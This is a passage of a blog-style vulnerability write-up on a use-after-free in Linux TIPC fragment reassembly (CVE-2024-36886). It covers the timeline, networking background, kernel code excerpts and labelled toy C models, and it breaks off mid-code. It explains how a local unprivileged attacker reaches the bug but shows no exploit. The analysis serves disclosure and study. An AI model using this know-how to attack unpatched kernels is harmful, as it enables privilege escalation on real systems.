<p>The vulnerability occurs due to a missing check in the error handling cleanup. On error, the reassembly will bail, freeing both the head buffer (and its chained buffers) and the latest fragment buffer currently being processed. If the latest fragment buffer has already been added to the head buffer&rsquo;s chain at this point, it will lead to a use-after-free.</p>
<p>The vulnerability was introduced in commit <a href="https://github.com/torvalds/linux/commit/1149557d64c97dc9adf3103347a1c0e8c06d3b89">1149557d64c9</a> (Mar 2015) and fixed in commit <a href="https://github.com/torvalds/linux/commit/080cbb890286cd794f1ee788bbc5463e2deb7c2b">080cbb890286</a> (May 2024), affecting kernel versions 4 through to 6.8.</p>
<p>It was assigned <a href="https://www.zerodayinitiative.com/advisories/ZDI-24-821/">ZDI-24-821</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-36886">CVE-2024-36886</a> (shoutout to the insane description formatting on that one).</p>
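<p>To make the error-path issue described above a bit more tangible, here&rsquo;s a toy userspace model. It is not <code>tipc_buf_append()</code>: the <code>toy_</code> structures and functions are invented, &ldquo;freeing&rdquo; just bumps a counter so the double free is observable without actually corrupting anything, and the &ldquo;checked&rdquo; variant is one hypothetical way to add the missing check, not necessarily what the upstream fix does.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy packet buffer: we count "frees" instead of releasing memory. */
struct toy_buf {
	struct toy_buf *next;	/* next buffer on the head's chain */
	int free_count;
};

void toy_free_one(struct toy_buf *b)
{
	b->free_count++;
}

/* Freeing the head also frees everything chained onto it. */
void toy_free_chain(struct toy_buf *head)
{
	for (struct toy_buf *b = head; b; b = b->next)
		toy_free_one(b);
}

/* Add frag to the end of head's chain. */
void toy_chain_append(struct toy_buf *head, struct toy_buf *frag)
{
	struct toy_buf *tail = head;

	assert(head != frag);
	while (tail->next)
		tail = tail->next;
	tail->next = frag;
	frag->next = NULL;
}

static bool toy_is_chained(const struct toy_buf *head,
			   const struct toy_buf *frag)
{
	for (const struct toy_buf *b = head->next; b; b = b->next)
		if (b == frag)
			return true;
	return false;
}

/* Buggy cleanup: frees the head's chain *and* the fragment, even when
 * the fragment is already part of that chain. */
void toy_error_path_buggy(struct toy_buf *head, struct toy_buf *frag)
{
	toy_free_chain(head);
	toy_free_one(frag);
}

/* Hypothetical cleanup with the check added. The chain is inspected
 * before anything is freed, since walking it afterwards would itself
 * touch freed buffers. */
void toy_error_path_checked(struct toy_buf *head, struct toy_buf *frag)
{
	bool chained = toy_is_chained(head, frag);

	toy_free_chain(head);
	if (!chained)
		toy_free_one(frag);
}
```

<p>Run the buggy path with a fragment that has already been chained and its <code>free_count</code> ends up at 2; in the kernel that second free lands on memory that has already been released.</p>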
<h3 id="timeline">Timeline</h3>
<ul>
<li>2024-03-23: Case opened with ZDI</li>
<li>2024-04-25: Case reviewed by ZDI</li>
<li>2024-04-25: Case disclosed to the vendor</li>
<li>2024-05-02: Fix published by the vendor</li>
<li>2024-06-20: Coordinated public release of ZDI advisory</li>
</ul>
<h2 id="background-stuff">Background Stuff</h2>
<p><img src="https://sam4k.com/content/images/2024/04/pepe_silvia.gif" alt=""></p>
<p>Before we dive into the juicy details, I&rsquo;m going to cover some background information to provide some additional context to the vulnerability. Feel free to skip this if you&rsquo;re already familiar with the networking subsystem and TIPC basics!</p>
<h3 id="net-basics"><code>net/</code> Basics</h3>
<p>So to kick things off let&rsquo;s try and give a bit of background on some of the networking subsystem fundamentals, as this is where the TIPC protocol is implemented!</p>
<p>I say try, because this subsystem is pretty complex and there&rsquo;s a lot of ground to cover. But in short, the networking subsystem does what it says on the tin: provides networking capability to the kernel. And it does it in a way which is modular and extensible, providing a core API to implement various networking devices, protocols and interfaces.</p>
<h4 id="struct-skbuff"><code>struct sk_buff</code></h4>
<p>One of the fundamental structures that the kernel provides is <a href="https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L842"><code>struct sk_buff</code></a> which represents a network packet and its status. The structure is created when a kernel packet is received, either from the user space or from the network interface.<a href="https://linux-kernel-labs.github.io/refs/heads/master/labs/networking.html#linux-networking">[3]</a></p>
<p>The kernel documentation honestly does a great job unpacking this rather complicated structure, so I&rsquo;d recommend <a href="https://docs.kernel.org/networking/skbuff.html">checking that out</a> (up to the checksum section at least).</p>
<p>Essentially, <code>struct sk_buff</code> itself stores various metadata and the actual packet data is stored in associated buffers. A large part of the complexity surrounding the structure is how these buffers, and the relevant pointers to them, are accessed and manipulated.</p>
<h4 id="struct-skbsharedinfo"><code>struct skb_shared_info</code></h4>
<p>One of the features baked into this core API is packet fragmentation, the idea that a protocol&rsquo;s data may be split across several packets - so we have a situation where some data is fragmented across the data buffers of several <code>struct sk_buff</code>s.</p>
<p>This is where <a href="https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L572"><code>struct skb_shared_info</code></a> comes in!</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">/*</span> <span class="n">This</span> <span class="n">data</span> <span class="n">is</span> <span class="n">invariant</span> <span class="n">across</span> <span class="n">clones</span> <span class="ow">and</span> <span class="n">lives</span> <span class="n">at</span>
</span></span><span class="line"><span class="cl"> <span class="o">*</span> <span class="n">the</span> <span class="n">end</span> <span class="n">of</span> <span class="n">the</span> <span class="n">header</span> <span class="n">data</span><span class="p">,</span> <span class="n">ie</span><span class="o">.</span> <span class="n">at</span> <span class="n">skb</span><span class="o">-&gt;</span><span class="n">end</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"> <span class="o">*/</span>
</span></span><span class="line"><span class="cl"><span class="n">struct</span> <span class="n">skb_shared_info</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="n">__u8</span>		<span class="n">flags</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">__u8</span>		<span class="n">meta_len</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">__u8</span>		<span class="n">nr_frags</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">__u8</span>		<span class="n">tx_flags</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">unsigned</span> <span class="n">short</span>	<span class="n">gso_size</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="o">/*</span> <span class="n">Warning</span><span class="p">:</span> <span class="n">this</span> <span class="n">field</span> <span class="n">is</span> <span class="ow">not</span> <span class="n">always</span> <span class="n">filled</span> <span class="ow">in</span> <span class="p">(</span><span class="n">UFO</span><span class="p">)</span><span class="o">!</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">unsigned</span> <span class="n">short</span>	<span class="n">gso_segs</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">sk_buff</span>	<span class="o">*</span><span class="n">frag_list</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">skb_shared_hwtstamps</span> <span class="n">hwtstamps</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">unsigned</span> <span class="ne">int</span>	<span class="n">gso_type</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">u32</span>		<span class="n">tskey</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">/*</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">Warning</span> <span class="p">:</span> <span class="n">all</span> <span class="n">fields</span> <span class="n">before</span> <span class="n">dataref</span> <span class="n">are</span> <span class="n">cleared</span> <span class="ow">in</span> <span class="n">__alloc_skb</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">atomic_t</span>	<span class="n">dataref</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">unsigned</span> <span class="ne">int</span>	<span class="n">xdp_frags_size</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">/*</span> <span class="n">Intermediate</span> <span class="n">layers</span> <span class="n">must</span> <span class="n">ensure</span> <span class="n">that</span> <span class="n">destructor_arg</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">remains</span> <span class="n">valid</span> <span class="n">until</span> <span class="n">skb</span> <span class="n">destructor</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">void</span> <span class="o">*</span>		<span class="n">destructor_arg</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">/*</span> <span class="n">must</span> <span class="n">be</span> <span class="n">last</span> <span class="n">field</span><span class="p">,</span> <span class="n">see</span> <span class="n">pskb_expand_head</span><span class="p">()</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">skb_frag_t</span>	<span class="n">frags</span><span class="p">[</span><span class="n">MAX_SKB_FRAGS</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L572">include/linux/skbuff.h</a> (6.7.4)</p>
<p>Among other things, this allows a packet to keep track of its fragments! Relevant to us is <code>frag_list</code>, used to link <code>struct sk_buff</code> headers together for reassembly.</p>
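<p>To picture how a <code>frag_list</code> chain hangs together, here&rsquo;s a minimal userspace sketch. Everything prefixed <code>toy_</code> is made up for illustration: the real <code>frag_list</code> lives in <code>struct skb_shared_info</code> rather than in the buffer header itself, and real <code>skb</code> length accounting is more involved than this.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Toy stand-in for a buffer header; only the fields needed for the sketch.
 * Assumption: frag_list is folded into the header here for brevity. */
struct toy_skb {
	struct toy_skb *next;      /* next buffer in a fragment chain */
	struct toy_skb *frag_list; /* head only: first chained fragment */
	unsigned int len;          /* bytes held by this buffer alone */
};

/* Append frag to the end of head's fragment chain. */
static void toy_chain_frag(struct toy_skb *head, struct toy_skb *frag)
{
	struct toy_skb **link;

	assert(head != NULL && frag != NULL);
	link = &head->frag_list;
	while (*link != NULL)
		link = &(*link)->next;
	frag->next = NULL;
	*link = frag;
}

/* Bytes reachable from head: its own data plus every chained fragment. */
static unsigned int toy_total_len(const struct toy_skb *head)
{
	const struct toy_skb *frag;
	unsigned int total;

	assert(head != NULL);
	total = head->len;
	for (frag = head->frag_list; frag != NULL; frag = frag->next)
		total += frag->len;
	return total;
}
```

<p>The head buffer owns the chain via <code>frag_list</code>, while the fragments themselves are linked through <code>next</code>, which is the shape the reassembly code later in this post walks.</p>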
<h3 id="tipc-primer">TIPC Primer</h3>
<p>Transparent Inter Process Communication (TIPC) is an IPC mechanism designed for intra-cluster communication, originating from Ericsson where it has been used in carrier grade cluster applications for many years. Cluster topology is managed around the concept of nodes and the links between these nodes.</p>
<p>TIPC communications are done over a &ldquo;bearer&rdquo;, which is a TIPC abstraction of a network interface. A &ldquo;media&rdquo; is a bearer type, of which there are four currently supported: Ethernet, Infiniband, UDP/IPv4 and UDP/IPv6.</p>
<p>A local attacker is able to set up a UDP bearer as an unprivileged user via netlink, as demonstrated by bl@sty during his work on CVE-2021-43267<a href="https://haxx.in/posts/pwning-tipc/">[1]</a>. However, a remote attacker is restricted by whatever bearers are already set up on a system.</p>
<p>TIPC messages have their own header, of which there are several formats outlined in the specification<a href="http://tipc.io/protocol.html">[2]</a>. A common theme is the concept of a message &ldquo;user&rdquo;, which defines the purpose of a message (see &ldquo;Figure 4: TIPC Message Types&rdquo;<a href="http://tipc.io/protocol.html">[2]</a>) and can be used to infer the format of the TIPC message.</p>
<p>There is a handshake to establish a link between nodes (see &ldquo;Link Creation&rdquo;<a href="http://tipc.io/protocol.html">[2]</a>), and an established link is required to reach the vulnerable code. The handshake essentially involves sending three messages: one to advertise the node, one to reset the state and then one to set the state.</p>
<hr>
<ol>
<li><a href="https://haxx.in/posts/pwning-tipc/">Exploiting CVE-2021-43267</a></li>
<li><a href="http://tipc.io/protocol.html">TIPC Protocol Documentation</a></li>
<li><a href="https://linux-kernel-labs.github.io/refs/heads/master/labs/networking.html#linux-networking">Linux Kernel Labs: Networking</a></li>
<li><a href="https://docs.kernel.org/networking/skbuff.html">Linux Kernel Documentation: struct sk_buff</a></li>
</ol>
<h2 id="the-vulnerability">The Vulnerability</h2>
<p><img src="https://sam4k.com/content/images/2024/04/here_we_go.gif" alt=""></p>
<p>🤓</p>
<p>For this example I&rsquo;m going to be assuming a local attacker interacting with message fragmentation over a UDP bearer, after establishing a link, on a 6.7.4 kernel.</p>
<p>The TIPC protocol features message fragmentation, where a single TIPC message can be split into fragments and sent to its destination via several packets:  </p>
<blockquote>
<p>When a message is longer than the identified MTU of the link it will use, it is split up in fragments, each being sent in separate packets to the destination node. Each fragment is wrapped into a packet headed by an TIPC internal header [&hellip;] The User field of the header is set to MSG_FRAGMENTER, and each fragment is assigned a Fragment Number relative to the first fragment of the message. Each fragmented message is also assigned a Fragmented Message Number, to be present in all fragments. [&hellip;] At reception the fragments are reassembled so that the original message is recreated, and then delivered upwards to the destination port. [1]</p>
</blockquote>
<p>So essentially, each fragment is wrapped up in a TIPC fragment message (a message with the <code>MSG_FRAGMENTER</code> user). Each of these fragment messages provides metadata in its header, such as the fragment number, so that the fragments can be reassembled in the right order on the receiving end.</p>
<p><img src="https://sam4k.com/content/images/2024/07/frags_example-4.png" alt=""></p>
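<p>To make that header metadata a bit more concrete, here&rsquo;s a rough userspace sketch of pulling the user, header size and type fields out of the big-endian header words. The bit positions and constant values mirror my reading of the accessors in <code>net/tipc/msg.h</code>, and the <code>toy_</code> names are invented for this example, so treat the offsets as assumptions to check against your own tree.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <arpa/inet.h> /* ntohl(), htonl() */

/* Assumed values, modelled on net/tipc/msg.h. */
#define TOY_MSG_FRAGMENTER 12
enum { TOY_FIRST_FRAGMENT = 0, TOY_FRAGMENT = 1, TOY_LAST_FRAGMENT = 2 };

/* Read a bit field from 32-bit header word w (stored in network byte order). */
static uint32_t toy_bits(const uint32_t *hdr, int w, int pos, uint32_t mask)
{
	return (ntohl(hdr[w]) >> pos) & mask;
}

/* Write a bit field into header word w; only used to build test headers. */
static void toy_set_bits(uint32_t *hdr, int w, int pos, uint32_t mask,
			 uint32_t val)
{
	uint32_t word = ntohl(hdr[w]);

	word &= ~(mask << pos);
	word |= (val & mask) << pos;
	hdr[w] = htonl(word);
}

/* Message user: word 0, bits 25..28 (assumed layout). */
static uint32_t toy_user(const uint32_t *hdr)
{
	return toy_bits(hdr, 0, 25, 0xf);
}

/* Header size in bytes: word 0, bits 21..24, stored in 4-byte units. */
static uint32_t toy_hdr_sz(const uint32_t *hdr)
{
	return toy_bits(hdr, 0, 21, 0xf) << 2;
}

/* Message type: word 1, bits 29..31; the fragment id for MSG_FRAGMENTER. */
static uint32_t toy_type(const uint32_t *hdr)
{
	return toy_bits(hdr, 1, 29, 0x7);
}
```

<p>For a <code>MSG_FRAGMENTER</code> message, the type field is what tells the receiver whether it is looking at the first, a middle or the last fragment.</p>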
<h3 id="exploring-the-call-trace">Exploring The Call Trace</h3>
<p>Let&rsquo;s take a look at the kernel call trace for a <code>MSG_FRAGMENTER</code> message being received by a TIPC UDP bearer. This gives us a bit of context about how the TIPC networking stack handles incoming packets:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">#0 tipc_link_input+0x41b/0x850 net/tipc/link.c:1339
</span></span><span class="line"><span class="cl">#1 tipc_link_rcv+0x77a/0x2dc0 net/tipc/link.c:1839
</span></span><span class="line"><span class="cl">#2 tipc_rcv+0x519/0x3030 net/tipc/node.c:2159
</span></span><span class="line"><span class="cl">#3 tipc_udp_recv+0x745/0x930 net/tipc/udp_media.c:421
</span></span><span class="line"><span class="cl">#4 udp_queue_rcv_one_skb+0xe76/0x19b0 net/ipv4/udp.c:2113
</span></span><span class="line"><span class="cl">#5 udp_queue_rcv_skb+0x136/0xa60 net/ipv4/udp.c:2191
</span></span></code></pre></div><p>#5 &amp; #4 are the underlying UDP networking stack. #3, <code>tipc_udp_recv()</code>, is where TIPC first receives inbound TIPC-over-UDP messages; it does some basic bearer level checks before handing the <code>skb</code> over to #2, <code>tipc_rcv()</code>.</p>
<p>After bearer level checks, all inbound TIPC packets are processed by #2, <code>tipc_rcv()</code>. This involves sanity checks on TIPC header values and using a combination of message user and link state to figure out how the packet is going to be processed.</p>
<p>A valid <code>MSG_FRAGMENTER</code> message is received by #1, <code>tipc_link_rcv()</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">tipc_link_rcv</span><span class="p">(</span><span class="k">struct</span> <span class="n">tipc_link</span> <span class="o">*</span><span class="n">l</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">          <span class="k">struct</span> <span class="n">sk_buff_head</span> <span class="o">*</span><span class="n">xmitq</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">struct</span> <span class="n">sk_buff_head</span> <span class="o">*</span><span class="n">defq</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">deferdq</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">struct</span> <span class="n">tipc_msg</span> <span class="o">*</span><span class="n">hdr</span> <span class="o">=</span> <span class="nf">buf_msg</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="n">u16</span> <span class="n">seqno</span><span class="p">,</span> <span class="n">rcv_nxt</span><span class="p">,</span> <span class="n">win_lim</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="kt">int</span> <span class="n">released</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="kt">int</span> <span class="n">rc</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="cm">/* Verify and update link state */</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="nf">msg_user</span><span class="p">(</span><span class="n">hdr</span><span class="p">)</span> <span class="o">==</span> <span class="n">LINK_PROTOCOL</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="nf">tipc_link_proto_rcv</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">skb</span><span class="p">,</span> <span class="n">xmitq</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="cm">/* Don&#39;t send probe at next timeout expiration */</span>
</span></span><span class="line"><span class="cl">    <span class="n">l</span><span class="o">-&gt;</span><span class="n">silent_intv_cnt</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">do</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="n">hdr</span> <span class="o">=</span> <span class="nf">buf_msg</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="n">seqno</span> <span class="o">=</span> <span class="nf">msg_seqno</span><span class="p">(</span><span class="n">hdr</span><span class="p">);</span>                                                 <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="n">rcv_nxt</span> <span class="o">=</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span><span class="p">;</span>                                                   <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="n">win_lim</span> <span class="o">=</span> <span class="n">rcv_nxt</span> <span class="o">+</span> <span class="n">TIPC_MAX_LINK_WIN</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="o">!</span><span class="nf">link_is_up</span><span class="p">(</span><span class="n">l</span><span class="p">)))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">            <span class="k">if</span> <span class="p">(</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">state</span> <span class="o">==</span> <span class="n">LINK_ESTABLISHING</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                <span class="n">rc</span> <span class="o">=</span> <span class="n">TIPC_LINK_UP_EVT</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">            <span class="nf">kfree_skb</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">            <span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="cm">/* Drop if outside receive window */</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="nf">less</span><span class="p">(</span><span class="n">seqno</span><span class="p">,</span> <span class="n">rcv_nxt</span><span class="p">)</span> <span class="o">||</span> <span class="nf">more</span><span class="p">(</span><span class="n">seqno</span><span class="p">,</span> <span class="n">win_lim</span><span class="p">)))</span> <span class="p">{</span>           <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">            <span class="n">l</span><span class="o">-&gt;</span><span class="n">stats</span><span class="p">.</span><span class="n">duplicates</span><span class="o">++</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">            <span class="nf">kfree_skb</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">            <span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">        <span class="n">released</span> <span class="o">+=</span> <span class="nf">tipc_link_advance_transmq</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">l</span><span class="p">,</span> <span class="nf">msg_ack</span><span class="p">(</span><span class="n">hdr</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">                              <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="cm">/* Defer delivery if sequence gap */</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="n">seqno</span> <span class="o">!=</span> <span class="n">rcv_nxt</span><span class="p">))</span> <span class="p">{</span>                                       <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">            <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">__tipc_skb_queue_sorted</span><span class="p">(</span><span class="n">defq</span><span class="p">,</span> <span class="n">seqno</span><span class="p">,</span> <span class="n">skb</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">                <span class="n">l</span><span class="o">-&gt;</span><span class="n">stats</span><span class="p">.</span><span class="n">duplicates</span><span class="o">++</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">            <span class="n">rc</span> <span class="o">|=</span> <span class="nf">tipc_link_build_nack_msg</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">xmitq</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">            <span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="cm">/* Deliver packet */</span>
</span></span><span class="line"><span class="cl">        <span class="n">l</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span><span class="o">++</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">l</span><span class="o">-&gt;</span><span class="n">stats</span><span class="p">.</span><span class="n">recv_pkts</span><span class="o">++</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="nf">msg_user</span><span class="p">(</span><span class="n">hdr</span><span class="p">)</span> <span class="o">==</span> <span class="n">TUNNEL_PROTOCOL</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="n">rc</span> <span class="o">|=</span> <span class="nf">tipc_link_tnl_rcv</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">skb</span><span class="p">,</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">inputq</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">tipc_data_input</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">skb</span><span class="p">,</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">inputq</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="n">rc</span> <span class="o">|=</span> <span class="nf">tipc_link_input</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">skb</span><span class="p">,</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">inputq</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">reasm_buf</span><span class="p">);</span>            <span class="p">[</span><span class="mi">5</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="o">++</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">rcv_unacked</span> <span class="o">&gt;=</span> <span class="n">TIPC_MIN_LINK_WIN</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="n">rc</span> <span class="o">|=</span> <span class="nf">tipc_link_build_state_msg</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">xmitq</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="n">rc</span> <span class="o">&amp;</span> <span class="o">~</span><span class="n">TIPC_LINK_SND_STATE</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span> <span class="k">while</span> <span class="p">((</span><span class="n">skb</span> <span class="o">=</span> <span class="nf">__tipc_skb_dequeue</span><span class="p">(</span><span class="n">defq</span><span class="p">,</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span><span class="p">)));</span>                     <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="cm">/* Forward queues and wake up waiting users */</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="n">released</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nf">tipc_link_update_cwin</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">released</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="nf">tipc_link_advance_backlog</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">xmitq</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="o">!</span><span class="nf">skb_queue_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">wakeupq</span><span class="p">)))</span>
</span></span><span class="line"><span class="cl">            <span class="nf">link_prepare_wakeup</span><span class="p">(</span><span class="n">l</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">rc</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/link.c#L1786">net/tipc/link.c</a> (6.7.4)</p>
<p><code>tipc_link_rcv()</code> uses the sequence number, pulled from the TIPC message header [0], to determine the order in which to process the incoming <code>skb</code>s. It uses <code>struct tipc_link</code> to manage the link state, including what <code>seqno</code> it&rsquo;s expecting next [1].</p>
<p>Out of order packets are either dropped [2] or added to the defer queue, <code>defq</code>, for later [3] [4]. When the packet&rsquo;s <code>seqno</code> matches the one the link expects next, the packet is delivered and the message user decides how it is processed. When the user is <code>MSG_FRAGMENTER</code>, the packet is passed to #0, <code>tipc_link_input()</code> [5].</p>
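<p>The drop/defer/deliver decision at [2] and [3] boils down to wraparound-safe comparisons on 16-bit sequence numbers. Here&rsquo;s a small userspace sketch of that logic. The <code>toy_</code> helpers are modelled on how I understand the kernel&rsquo;s <code>less()</code> and <code>more()</code> to work, and the window size of 8191 is my assumption for <code>TIPC_MAX_LINK_WIN</code>, so double check both against the source.</p>

```c
#include <assert.h>
#include <stdint.h>

#define TOY_MAX_LINK_WIN 8191 /* assumed value of TIPC_MAX_LINK_WIN */

enum toy_verdict { TOY_DROP, TOY_DEFER, TOY_DELIVER };

/* left <= right in modulo-2^16 arithmetic. Relies on the usual two's
 * complement narrowing when the difference is cast to int16_t. */
static int toy_less_eq(uint16_t left, uint16_t right)
{
	return (int16_t)(right - left) >= 0;
}

static int toy_more(uint16_t left, uint16_t right)
{
	return !toy_less_eq(left, right);
}

static int toy_less(uint16_t left, uint16_t right)
{
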